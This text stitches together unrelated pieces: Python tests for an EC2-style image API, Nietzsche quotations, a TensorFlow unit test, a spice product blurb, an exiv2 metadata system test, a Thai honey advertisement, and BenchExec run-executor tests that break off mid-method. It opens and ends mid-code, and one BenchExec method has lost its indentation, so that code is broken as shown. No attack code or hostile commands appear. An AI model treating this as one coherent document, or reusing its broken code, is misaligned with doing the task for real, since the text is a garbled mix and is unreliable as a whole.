                          Description='desc')

        data = self.client.terminate_instances(InstanceIds=[instance_id])
        self.get_instance_waiter().wait_delete(instance_id)

    def _create_image(self, name, desc, extra_run_instance_args=None):
        """Boot an EBS instance, create an image from it and terminate it.

        Registers cleanup for the created volumes/snapshots and returns the
        new image id together with its cleanup handle.
        """
        # NOTE: None (not a mutable {}) as the default avoids a dict shared
        # between calls; behavior for callers is unchanged.
        if extra_run_instance_args is None:
            extra_run_instance_args = {}
        image_id = CONF.aws.ebs_image_id
        data = self.client.describe_images(ImageIds=[image_id])
        image = data['Images'][0]
        self.assertTrue('RootDeviceType' in image
                        and 'ebs' in image['RootDeviceType'])
        instance_id = self.run_instance(ImageId=image_id,
                                        **extra_run_instance_args)
        instance = self.get_instance(instance_id)
        for bdm in instance.get('BlockDeviceMappings', []):
            if 'Ebs' in bdm:
                self.addResourceCleanUp(self.client.delete_volume,
                                        VolumeId=bdm['Ebs']['VolumeId'])

        data = self.client.create_image(InstanceId=instance_id,
                                        Name=name, Description=desc)
        image_id = data['ImageId']
        image_clean = self.addResourceCleanUp(self.client.deregister_image,
                                              ImageId=image_id)
        self.get_image_waiter().wait_available(image_id)

        # The snapshots backing the new image must be cleaned up as well.
        data = self.client.describe_images(ImageIds=[image_id])
        for bdm in data['Images'][0].get('BlockDeviceMappings', []):
            if 'Ebs' in bdm and 'SnapshotId' in bdm['Ebs']:
                snapshot_id = bdm['Ebs']['SnapshotId']
                self.addResourceCleanUp(self.client.delete_snapshot,
                                        SnapshotId=snapshot_id)

        data = self.client.terminate_instances(InstanceIds=[instance_id])
        self.get_instance_waiter().wait_delete(instance_id)

        return image_id, image_clean

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_create_image_from_ebs_instance(self):
        """An image created from an EBS instance has the expected properties."""
        name = data_utils.rand_name('image')
        desc = data_utils.rand_name('description')
        image_id, image_clean = self._create_image(name, desc)

        data = self.client.describe_images(ImageIds=[image_id])
        self.assertEqual(1, len(data['Images']))
        image = data['Images'][0]

        self.assertIsNotNone(image['CreationDate'])
        self.assertEqual("ebs", image['RootDeviceType'])
        self.assertFalse(image['Public'])
        self.assertEqual(name, image['Name'])
        self.assertEqual(desc, image['Description'])
        self.assertEqual('machine', image['ImageType'])
        self.assertNotEmpty(image['BlockDeviceMappings'])
        for bdm in image['BlockDeviceMappings']:
            self.assertIn('DeviceName', bdm)

        data = self.client.deregister_image(ImageId=image_id)
        self.cancelResourceCleanUp(image_clean)

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_check_simple_image_attributes(self):
        """kernel/ramdisk/description attributes are readable and mutable."""
        name = data_utils.rand_name('image')
        desc = data_utils.rand_name('desc for image')
        image_id, image_clean = self._create_image(name, desc)

        data = self.client.describe_image_attribute(
            ImageId=image_id, Attribute='kernel')
        self.assertIn('KernelId', data)

        data = self.client.describe_image_attribute(
            ImageId=image_id, Attribute='ramdisk')
        self.assertIn('RamdiskId', data)

        # description
        data = self.client.describe_image_attribute(
            ImageId=image_id, Attribute='description')
        self.assertIn('Description', data)
        self.assertIn('Value', data['Description'])
        self.assertEqual(desc, data['Description']['Value'])

        def _modify_description(**kwargs):
            # Modify via either API form and verify the change took effect.
            self.client.modify_image_attribute(ImageId=image_id, **kwargs)
            data = self.client.describe_image_attribute(
                ImageId=image_id, Attribute='description')
            self.assertEqual(new_desc, data['Description']['Value'])

        new_desc = data_utils.rand_name('new desc')
        _modify_description(Attribute='description', Value=new_desc)
        _modify_description(Description={'Value': new_desc})

        data = self.client.deregister_image(ImageId=image_id)
        self.cancelResourceCleanUp(image_clean)

    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_check_bdm_in_image(self):
        """Extra block device mappings of the instance show up in the image."""
        image_id = CONF.aws.ebs_image_id
        data = self.client.describe_images(ImageIds=[image_id])
        root_device_name = data['Images'][0]['RootDeviceName']
        device_name_prefix = base.get_device_name_prefix(root_device_name)
        device_name = device_name_prefix + 'h'

        name = data_utils.rand_name('image')
        desc = data_utils.rand_name('description')
        image_id, image_clean = self._create_image(
            name, desc,
            extra_run_instance_args={
                'BlockDeviceMappings': [{'DeviceName': device_name,
                                         'Ebs': {'VolumeSize': 1}}]})

        data = self.client.describe_images(ImageIds=[image_id])
        image = data['Images'][0]
        for bdm in image['BlockDeviceMappings']:
            # NOTE: was assertTrue('DeviceName', bdm), which always passed
            # because a non-empty string is truthy and bdm became the
            # assertion message; assertIn is the intended check.
            self.assertIn('DeviceName', bdm)

        data = self.client.deregister_image(ImageId=image_id)
        self.cancelResourceCleanUp(image_clean)

    @testtools.skipUnless(CONF.aws.run_incompatible_tests,
        'By default glance is configured as "publicize_image": "role:admin"')
    @testtools.skipUnless(CONF.aws.run_incompatible_tests,
        'skip due to bug #1439819')
    @testtools.skipUnless(CONF.aws.ebs_image_id, "EBS image id is not defined")
    def test_check_launch_permission_attribute(self):
        """launchPermission can be granted, reset and reflected in Public."""
        name = data_utils.rand_name('image')
        desc = data_utils.rand_name('desc for image')
        image_id, image_clean = self._create_image(name, desc)

        # launch permission
        data = self.client.describe_image_attribute(
            ImageId=image_id, Attribute='launchPermission')
        self.assertIn('LaunchPermissions', data)
        self.assertEmpty(data['LaunchPermissions'])

        def _modify_launch_permission(**kwargs):
            # Grant 'all' via either API form; the image must become public,
            # and resetting the attribute must make it private again.
            self.client.modify_image_attribute(ImageId=image_id, **kwargs)
            data = self.client.describe_image_attribute(
                ImageId=image_id, Attribute='launchPermission')
            self.assertIn('LaunchPermissions', data)
            self.assertNotEmpty(data['LaunchPermissions'])
            self.assertIn('Group', data['LaunchPermissions'][0])
            self.assertEqual('all', data['LaunchPermissions'][0]['Group'])
            data = self.client.describe_images(ImageIds=[image_id])
            self.assertTrue(data['Images'][0]['Public'])

            self.client.reset_image_attribute(
                ImageId=image_id, Attribute='launchPermission')
            data = self.client.describe_image_attribute(
                ImageId=image_id, Attribute='launchPermission')
            self.assertEmpty(data['LaunchPermissions'])
            data = self.client.describe_images(ImageIds=[image_id])
            self.assertFalse(data['Images'][0]['Public'])

        _modify_launch_permission(Attribute='launchPermission',
                                  OperationType='add', UserGroups=['all'])
        _modify_launch_permission(LaunchPermission={'Add': [{'Group': 'all'}]})

        data = self.client.deregister_image(ImageId=image_id)
        self.cancelResourceCleanUp(image_clean)
class ImageRegisterTest(base.EC2TestCase):
    """Tests registering and deregistering an AMI image from an S3 manifest."""

    # States an image may legitimately be in right after registration.
    valid_image_state = set(('available', 'pending', 'failed'))

    @classmethod
    @base.safe_setup
    def setUpClass(cls):
        super(ImageRegisterTest, cls).setUpClass()
        cls.image_location = CONF.aws.ami_image_location
        if not cls.image_location:
            raise cls.skipException('Image materials are not ready in S3')

    def test_register_get_deregister_ami_image(self):
        """Register an AMI, describe it, then deregister and verify removal."""
        image_name = data_utils.rand_name("ami-name")
        data = self.client.register_image(
            Name=image_name, ImageLocation=self.image_location)
        image_id = data['ImageId']
        image_clean = self.addResourceCleanUp(self.client.deregister_image,
                                              ImageId=image_id)
        # AMI image ids carry the "ami" prefix
        self.assertEqual(image_id[0:3], "ami")

        data = self.client.describe_images(ImageIds=[image_id])
        self.assertEqual(1, len(data['Images']))

        image = data['Images'][0]
        self.assertEqual(image_name, image['Name'])
        self.assertEqual(image_id, image['ImageId'])
        self.assertIn(image['State'], self.valid_image_state)

        self.get_image_waiter().wait_available(image_id)

        self.client.deregister_image(ImageId=image_id)
        # NOTE(review): passing an EC2 error-code string as the first argument
        # relies on the custom assertRaises of base.EC2TestCase, not on the
        # stdlib unittest signature — confirm against the base class.
        self.assertRaises('InvalidAMIID.NotFound',
                          self.client.describe_images,
                          ImageIds=[image_id])
        self.cancelResourceCleanUp(image_clean)
|
The overman... who has organized the chaos of his passions, given style to his character, and become creative. Aware of life's terrors, he affirms life without resentment.
I can tell by my own reaction to it that this book is harmful." But let him only wait and perhaps one day he will admit to himself that this same book has done him a great service by bringing out the hidden sickness of his heart and making it visible.— Altered opinions do not alter a man’s character (or do so very little); but they do illuminate individual aspects of the constellation of his personality which with a different constellation of opinions had hitherto remained dark and unrecognizable.
Genuine historical knowledge requires nobility of character, a profound understanding of human existence - not detachment and objectivity.
A married philosopher is a comic character.
Whoever has character also has his typical experience, which returns over and over again.
You gave him an opportunity of showing greatness of character and he did not seize it. He will never forgive you for that.
If a man has character, he has also his typical experience, which always recurs.
It is far pleasanter to injure and afterwards beg forgiveness than to be injured and grant forgiveness. He who does the former gives evidence of power and afterwards of kindness of character.
A strong and well-constituted man digests his experiences (deeds and misdeeds all included) just as he digests his meats, even when he has some tough morsels to swallow.
Giving style” to one’s character - a great and rare art! It is exercised by those who see all the strengths and weaknesses of their own natures and then comprehend them in an artistic plan until everything appears as art and reason and even weakness delights the eye.
Solitude makes us tougher towards ourselves and tenderer towards others. In both ways it improves our character.
When one speaks of humanity, the idea is fundamental that this is something which separates and distinguishes man from nature. In reality, however, there is no such separation: "natural" qualities and those called truly "human" are inseparably grown together. Man, in his highest and noblest capacities, is wholly nature and embodies its uncanny dual character. Those of his abilities which are terrifying and considered inhuman may even be the fertile soil out of which alone all humanity can grow in impulse, deed, and work.
The shortest route is not the most direct one, but rather the one where the most favorable winds swell our sails: that is the lesson that seafarers teach. Not to abide by this lesson is to be obstinate: here, firmness of character is tainted with stupidity.
Unresolved dissonances between the characters and dispositions of the parents continue to reverberate in the nature of the child and make up the history of its inner sufferings.
That lies should be necessary to life is part and parcel of the terrible and questionable character of existence.
He who recites dramatic works makes discoveries about his own character.
Thus strength is afforded by good and thorough customs, thus is learnt the subjection of the individual, and strenuousness of character becomes a birth gift and afterwards is fostered as a habit.
A man far oftener appears to have a decided character from persistently following his temperament than from persistently following his principles.
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the hybrid tensor forest model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.hybrid.python import hybrid_model
from tensorflow.contrib.tensor_forest.hybrid.python.layers import fully_connected
from tensorflow.contrib.tensor_forest.python import tensor_forest
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class HybridLayerTest(test_util.TensorFlowTestCase):
  """Tests layer numbering of hybrid tensor forest fully-connected layers."""

  def setUp(self):
    # Hyperparameters are distinct small values so mixed-up fields would be
    # easy to spot in failures.
    self.params = tensor_forest.ForestHParams(
        num_classes=3,
        num_features=7,
        layer_size=11,
        num_layers=13,
        num_trees=17,
        connection_probability=0.1,
        hybrid_tree_depth=4,
        regularization_strength=0.01,
        regularization="",
        weight_init_mean=0.0,
        weight_init_std=0.1)
    self.params.num_nodes = 2**self.params.hybrid_tree_depth - 1
    self.params.num_leaves = 2**(self.params.hybrid_tree_depth - 1)

  def testLayerNums(self):
    """Each FullyConnectedLayer must report the layer_num it was built with."""
    # Fix: use assertEqual instead of the deprecated assertEquals alias,
    # which is removed in Python 3.12.
    for expected_num in (0, 1, 2):
      layer = fully_connected.FullyConnectedLayer(self.params, expected_num,
                                                  None)
      self.assertEqual(layer.layer_num, expected_num)
# Run the test suite when executed as a script.
if __name__ == "__main__":
  googletest.main()
|
A traditional Middle Eastern treat. Great on hummus or mixed with olive oil. This refreshing spice blend should be a staple in anyone's spice cabinet.
Tin Net weight: 0.9 oz.
|
# -*- coding: utf-8 -*-
import system_tests
@system_tests.CopyFiles("$data_path/exiv2-empty.jpg")
@system_tests.CopyFiles("$data_path/exiv2-empty.jpg")
class CheckXmlLang(metaclass=system_tests.CaseMeta):
    """Checks handling of the xml:lang qualifier on Xmp.dc.title,
    including case-insensitive matching of language tags (issue 1058)."""

    url = "http://dev.exiv2.org/issues/1058"
    filename = system_tests.path("$data_path/exiv2-empty_copy.jpg")
    commands = [
        ## Add titles in 2 languages and one default
        """$exiv2 -M"set Xmp.dc.title lang=de-DE GERMAN" $filename""",
        """$exiv2 -M"set Xmp.dc.title lang=en-GB BRITISH" $filename""",
        """$exiv2 -M"set Xmp.dc.title Everybody else" $filename""",
        """$exiv2 -px $filename""",
        ## Remove languages, test case for the language
        """$exiv2 -M"set Xmp.dc.title lang=DE-de german" $filename""",
        """$exiv2 -M"set Xmp.dc.title lang=EN-gb" $filename""",
        """$exiv2 -M"set Xmp.dc.title" $filename""",
        """$exiv2 -px $filename""",
    ]
    # Expected stdout per command, in order: the -M modification commands
    # print nothing; the -px commands print the remaining LangAlt entries.
    # NOTE(review): internal whitespace of these expected strings must match
    # exiv2's column-aligned output exactly — verify against a real run.
    stdout = [
        "",
        "",
        "",
        """Xmp.dc.title LangAlt 3 lang="x-default" Everybody else, lang="en-GB" BRITISH, lang="de-DE" GERMAN
""",
        "",
        "",
        "",
        """Xmp.dc.title LangAlt 1 lang="de-DE" german
""",
    ]
    # All commands are expected to run silently and successfully.
    stderr = [""] * len(commands)
    retval = [0] * len(commands)
|
ค้าขายอาเซียน | ASEAN Economic Community (AEC) ประเทศพม่า | Myanmar Honey Bee 100% & Pure Royal Jelly "Guarantee"
Honey Bee 100% & Pure Royal Jelly "Guarantee"
Honey Bee, 1 kg: 120 Baht (Thai) --- this price applies for orders up to 30 kg.
บริษัท ซี.เค.เอเซีย ฟาร์มมิ่ง จำกัด / C.K. Asia Farming Co., Ltd.
|
# This file is part of BenchExec, a framework for reliable benchmarking:
# https://github.com/sosy-lab/benchexec
#
# SPDX-FileCopyrightText: 2007-2020 Dirk Beyer <https://www.sosy-lab.org>
#
# SPDX-License-Identifier: Apache-2.0
import contextlib
import logging
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import shutil
from benchexec import container
from benchexec import containerexecutor
from benchexec import filehierarchylimit
from benchexec.runexecutor import RunExecutor
from benchexec import runexecutor
from benchexec import util
sys.dont_write_bytecode = True  # prevent creation of .pyc files

# Location of the runexec command-line tool relative to this test file.
here = os.path.dirname(__file__)
base_dir = os.path.join(here, "..")
bin_dir = os.path.join(base_dir, "bin")
runexec = os.path.join(bin_dir, "runexec")

# Upper bound accepted for walltime/cputime of a trivial run like /bin/echo.
trivial_run_grace_time = 0.2
class TestRunExecutor(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        """Configure verbose assertion output and capture all log levels."""
        cls.longMessage = True
        cls.maxDiff = None
        logging.disable(logging.NOTSET)  # need to make sure to get all messages
        if not hasattr(cls, "assertRegex"):
            # compatibility with old Python versions that only provide the
            # deprecated assertRegexpMatches name
            cls.assertRegex = cls.assertRegexpMatches
    def setUp(self, *args, **kwargs):
        """Create the RunExecutor under test; skips the test when the
        freezer cgroup required for reliable process killing is missing."""
        with self.skip_if_logs(
            "Cannot reliably kill sub-processes without freezer cgroup"
        ):
            self.runexecutor = RunExecutor(use_namespaces=False, *args, **kwargs)
    @contextlib.contextmanager
    def skip_if_logs(self, error_msg):
        """A context manager that automatically marks the test as skipped if SystemExit
        is thrown and the given error message had been logged with level ERROR."""
        # Note: assertLogs checks that there is at least one log message of given level.
        # This is not what we want, so we just rely on one debug message being present.
        try:
            with self.assertLogs(level=logging.DEBUG) as log:
                yield
        except SystemExit as e:
            if any(
                record.levelno == logging.ERROR and record.msg.startswith(error_msg)
                for record in log.records
            ):
                self.skipTest(e)
            # any other SystemExit is a real failure — re-raise
            raise e
    def execute_run(self, *args, expect_terminationreason=None, **kwargs):
        """Execute the given command in-process via self.runexecutor.

        Returns (result dict, list of output lines) and asserts that the
        terminationreason matches expect_terminationreason (a single value,
        or any element of a list).
        """
        (output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
        try:
            result = self.runexecutor.execute_run(list(args), output_filename, **kwargs)
            output = os.read(output_fd, 4096).decode()
        finally:
            os.close(output_fd)
            os.remove(output_filename)

        self.check_result_keys(result, "terminationreason")
        if isinstance(expect_terminationreason, list):
            self.assertIn(
                result.get("terminationreason"),
                expect_terminationreason,
                "Unexpected terminationreason, output is \n" + output,
            )
        else:
            self.assertEqual(
                result.get("terminationreason"),
                expect_terminationreason,
                "Unexpected terminationreason, output is \n" + output,
            )
        return (result, output.splitlines())
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--no-container",
"--output",
kwargs["output_filename"],
] + list(args)
    def execute_run_extern(self, *args, expect_terminationreason=None, **kwargs):
        """Execute the given command through the external runexec CLI.

        Parses the key=value lines printed by runexec into a result dict and
        asserts the terminationreason like execute_run(); returns
        (result dict, list of output lines).
        """
        (output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
        try:
            runexec_output = subprocess.check_output(
                args=self.get_runexec_cmdline(*args, output_filename=output_filename),
                stderr=subprocess.DEVNULL,
                universal_newlines=True,
                **kwargs,
            )
            output = os.read(output_fd, 4096).decode()
        except subprocess.CalledProcessError as e:
            print(e.output)
            raise e
        finally:
            os.close(output_fd)
            os.remove(output_filename)

        # runexec prints one "key=value" per line
        result = {
            key.strip(): value.strip()
            for (key, _, value) in (
                line.partition("=") for line in runexec_output.splitlines()
            )
        }
        self.check_result_keys(result, "terminationreason", "returnvalue")
        if isinstance(expect_terminationreason, list):
            self.assertIn(
                result.get("terminationreason"),
                expect_terminationreason,
                "Unexpected terminationreason, output is \n" + output,
            )
        else:
            self.assertEqual(
                result.get("terminationreason"),
                expect_terminationreason,
                "Unexpected terminationreason, output is \n" + output,
            )
        return (result, output.splitlines())
def check_command_in_output(self, output, cmd):
self.assertEqual(output[0], cmd, "run output misses executed command")
    def check_result_keys(self, result, *additional_keys):
        """Assert that the result dict contains only expected keys
        (standard measurement keys, per-CPU/per-package variants, plus any
        additional_keys the caller allows)."""
        expected_keys = {
            "cputime",
            "walltime",
            "memory",
            "exitcode",
            "cpuenergy",
            "blkio-read",
            "blkio-write",
            "starttime",
        }
        expected_keys.update(additional_keys)
        for key in result.keys():
            if key.startswith("cputime-cpu"):
                # per-core cputime entries like cputime-cpu0
                self.assertRegex(
                    key,
                    "^cputime-cpu[0-9]+$",
                    f"unexpected result entry '{key}={result[key]}'",
                )
            elif key.startswith("cpuenergy-"):
                # per-package energy entries like cpuenergy-pkg0-core
                self.assertRegex(
                    key,
                    "^cpuenergy-pkg[0-9]+-(package|core|uncore|dram|psys)$",
                    f"unexpected result entry '{key}={result[key]}'",
                )
            else:
                self.assertIn(
                    key,
                    expected_keys,
                    f"unexpected result entry '{key}={result[key]}'",
                )
    def check_exitcode(self, result, exitcode, msg=None):
        """Assert the raw exit code of an in-process run matches exitcode."""
        self.assertEqual(result["exitcode"].raw, exitcode, msg)
    def check_exitcode_extern(self, result, exitcode, msg=None):
        """Like check_exitcode(), but for the string-valued result dict of an
        external runexec invocation (returnvalue/exitsignal entries)."""
        exitcode = util.ProcessExitCode.from_raw(exitcode)
        if exitcode.value is not None:
            self.assertEqual(int(result["returnvalue"]), exitcode.value, msg)
        else:
            self.assertEqual(int(result["exitsignal"]), exitcode.signal, msg)
    def test_command_output(self):
        """Command line and stdout of the tool must appear in the output log."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        (_, output) = self.execute_run("/bin/echo", "TEST_TOKEN")
        self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
        self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
        # everything between command line and output is a separator line
        for line in output[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_command_error_output(self):
        """stderr must go to the separate error file and not the output file,
        while stdout appears in the output file only."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")

        def execute_Run_intern(*args, **kwargs):
            # helper: run with a dedicated error file, return both logs
            (error_fd, error_filename) = tempfile.mkstemp(".log", "error_", text=True)
            try:
                (_, output_lines) = self.execute_run(
                    *args, error_filename=error_filename, **kwargs
                )
                error_lines = os.read(error_fd, 4096).decode().splitlines()
                return (output_lines, error_lines)
            finally:
                os.close(error_fd)
                os.remove(error_filename)

        # stderr-only command: token must appear only in the error log
        (output_lines, error_lines) = execute_Run_intern(
            "/bin/sh", "-c", "/bin/echo ERROR_TOKEN >&2"
        )
        self.assertEqual(
            error_lines[-1], "ERROR_TOKEN", "run error output misses command output"
        )
        for line in output_lines[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
        for line in error_lines[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run error output")

        # stdout-only command: token must appear only in the output log
        (output_lines, error_lines) = execute_Run_intern("/bin/echo", "OUT_TOKEN")
        self.check_command_in_output(output_lines, "/bin/echo OUT_TOKEN")
        self.check_command_in_output(error_lines, "/bin/echo OUT_TOKEN")
        self.assertEqual(
            output_lines[-1], "OUT_TOKEN", "run output misses command output"
        )
        for line in output_lines[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
        for line in error_lines[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run error output")
    def test_command_result(self):
        """Exit code, walltime and cputime of a trivial run must be sane."""
        if not os.path.exists("/bin/echo"):
            self.skipTest("missing /bin/echo")
        (result, _) = self.execute_run("/bin/echo", "TEST_TOKEN")
        self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
        self.assertAlmostEqual(
            result["walltime"],
            trivial_run_grace_time,
            delta=trivial_run_grace_time,
            msg="walltime of /bin/echo not as expected",
        )
        if "cputime" in result:  # not present without cpuacct cgroup
            self.assertAlmostEqual(
                result["cputime"],
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg="cputime of /bin/echo not as expected",
            )
        self.check_result_keys(result)
    def test_wrong_command(self):
        """A non-existing executable must yield terminationreason 'failed'."""
        (result, _) = self.execute_run(
            "/does/not/exist", expect_terminationreason="failed"
        )
def test_wrong_command_extern(self):
(result, _) = self.execute_run(
"/does/not/exist", expect_terminationreason="failed"
)
    def test_cputime_hardlimit(self):
        """A busy loop must be killed (exit signal 9) at the hard CPU-time
        limit, with walltime and cputime close to that limit."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
            (result, output) = self.execute_run(
                "/bin/sh",
                "-c",
                "i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
                hardtimelimit=1,
                expect_terminationreason="cputime",
            )

        self.check_exitcode(result, 9, "exit code of killed process is not 9")
        self.assertAlmostEqual(
            result["walltime"],
            1.4,
            delta=0.5,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        self.assertAlmostEqual(
            result["cputime"],
            1.4,
            delta=0.5,
            msg="cputime is not approximately the time after which the process should have been killed",
        )
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_cputime_softlimit(self):
        """A busy loop must be terminated (SIGTERM, exit signal 15) at the
        soft CPU-time limit."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        with self.skip_if_logs(
            "Soft time limit cannot be specified without cpuacct cgroup"
        ):
            (result, output) = self.execute_run(
                "/bin/sh",
                "-c",
                "i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
                softtimelimit=1,
                expect_terminationreason="cputime-soft",
            )

        self.check_exitcode(result, 15, "exit code of killed process is not 15")
        self.assertAlmostEqual(
            result["walltime"],
            4,
            delta=3,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        self.assertAlmostEqual(
            result["cputime"],
            4,
            delta=3,
            msg="cputime is not approximately the time after which the process should have been killed",
        )
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_walltime_limit(self):
        """A sleeping process must be killed at the walltime limit while
        having consumed almost no CPU time."""
        if not os.path.exists("/bin/sleep"):
            self.skipTest("missing /bin/sleep")
        (result, output) = self.execute_run(
            "/bin/sleep", "10", walltimelimit=1, expect_terminationreason="walltime"
        )

        self.check_exitcode(result, 9, "exit code of killed process is not 9")
        self.assertAlmostEqual(
            result["walltime"],
            4,
            delta=3,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        if "cputime" in result:  # not present without cpuacct cgroup
            self.assertAlmostEqual(
                result["cputime"],
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg="cputime of /bin/sleep is not approximately zero",
            )

        self.check_command_in_output(output, "/bin/sleep 10")
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_cputime_walltime_limit(self):
        """When both limits are set, the tighter CPU-time limit must fire."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
            (result, output) = self.execute_run(
                "/bin/sh",
                "-c",
                "i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
                hardtimelimit=1,
                walltimelimit=5,
                expect_terminationreason="cputime",
            )

        self.check_exitcode(result, 9, "exit code of killed process is not 9")
        self.assertAlmostEqual(
            result["walltime"],
            1.4,
            delta=0.5,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        self.assertAlmostEqual(
            result["cputime"],
            1.4,
            delta=0.5,
            msg="cputime is not approximately the time after which the process should have been killed",
        )
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_all_timelimits(self):
        """With soft, hard and walltime limits set, the soft CPU-time limit
        (the tightest one) must fire first with SIGTERM."""
        if not os.path.exists("/bin/sh"):
            self.skipTest("missing /bin/sh")
        with self.skip_if_logs("Time limit cannot be specified without cpuacct cgroup"):
            (result, output) = self.execute_run(
                "/bin/sh",
                "-c",
                "i=0; while [ $i -lt 10000000 ]; do i=$(($i+1)); done; echo $i",
                softtimelimit=1,
                hardtimelimit=2,
                walltimelimit=5,
                expect_terminationreason="cputime-soft",
            )

        self.check_exitcode(result, 15, "exit code of killed process is not 15")
        self.assertAlmostEqual(
            result["walltime"],
            1.4,
            delta=0.5,
            msg="walltime is not approximately the time after which the process should have been killed",
        )
        self.assertAlmostEqual(
            result["cputime"],
            1.4,
            delta=0.5,
            msg="cputime is not approximately the time after which the process should have been killed",
        )
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_input_is_redirected_from_devnull(self):
        """/bin/cat must terminate immediately because its stdin is /dev/null."""
        if not os.path.exists("/bin/cat"):
            self.skipTest("missing /bin/cat")
        (result, output) = self.execute_run("/bin/cat", walltimelimit=1)

        self.check_exitcode(result, 0, "exit code of process is not 0")
        self.assertAlmostEqual(
            result["walltime"],
            trivial_run_grace_time,
            delta=trivial_run_grace_time,
            msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
        )
        if "cputime" in result:  # not present without cpuacct cgroup
            self.assertAlmostEqual(
                result["cputime"],
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
            )
        self.check_result_keys(result)

        self.check_command_in_output(output, "/bin/cat")
        for line in output[1:]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_input_is_redirected_from_file(self):
        """Content of a file passed as stdin must be echoed by /bin/cat."""
        if not os.path.exists("/bin/cat"):
            self.skipTest("missing /bin/cat")
        with tempfile.TemporaryFile() as tmp:
            tmp.write(b"TEST_TOKEN")
            tmp.flush()
            tmp.seek(0)  # rewind so the run reads from the beginning
            (result, output) = self.execute_run("/bin/cat", stdin=tmp, walltimelimit=1)

        self.check_exitcode(result, 0, "exit code of process is not 0")
        self.assertAlmostEqual(
            result["walltime"],
            trivial_run_grace_time,
            delta=trivial_run_grace_time,
            msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
        )
        if "cputime" in result:  # not present without cpuacct cgroup
            self.assertAlmostEqual(
                result["cputime"],
                trivial_run_grace_time,
                delta=trivial_run_grace_time,
                msg='cputime of "/bin/cat < /dev/null" is not approximately zero',
            )
        self.check_result_keys(result)

        self.check_command_in_output(output, "/bin/cat")
        self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
        for line in output[1:-1]:
            self.assertRegex(line, "^-*$", "unexpected text in run output")
    def test_input_is_redirected_from_stdin(self):
        """runexec --input - must forward our stdin to the benchmarked tool."""
        if not os.path.exists("/bin/cat"):
            self.skipTest("missing /bin/cat")

        (output_fd, output_filename) = tempfile.mkstemp(".log", "output_", text=True)
        cmd = self.get_runexec_cmdline(
            "--input",
            "-",
            "--walltime",
            "1",
            "/bin/cat",
            output_filename=output_filename,
        )
        try:
            process = subprocess.Popen(
                args=cmd,
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                stderr=subprocess.DEVNULL,
                universal_newlines=True,
            )
            try:
                runexec_output, unused_err = process.communicate("TEST_TOKEN")
            except BaseException:
                # catch everything, we re-raise
                process.kill()
                process.wait()
                raise
            retcode = process.poll()
            if retcode:
                print(runexec_output)
                raise subprocess.CalledProcessError(retcode, cmd, output=runexec_output)

            output = os.read(output_fd, 4096).decode().splitlines()
        finally:
            os.close(output_fd)
            os.remove(output_filename)

        # parse the key=value lines printed by runexec
        result = {
            key.strip(): value.strip()
            for (key, _, value) in (
                line.partition("=") for line in runexec_output.splitlines()
            )
        }
        self.check_exitcode_extern(result, 0, "exit code of process is not 0")
        self.assertAlmostEqual(
            float(result["walltime"].rstrip("s")),
            trivial_run_grace_time,
            delta=trivial_run_grace_time,
            msg='walltime of "/bin/cat < /dev/null" is not approximately zero',
        )
        if "cputime" in result:  # not present without cpuacct cgroup
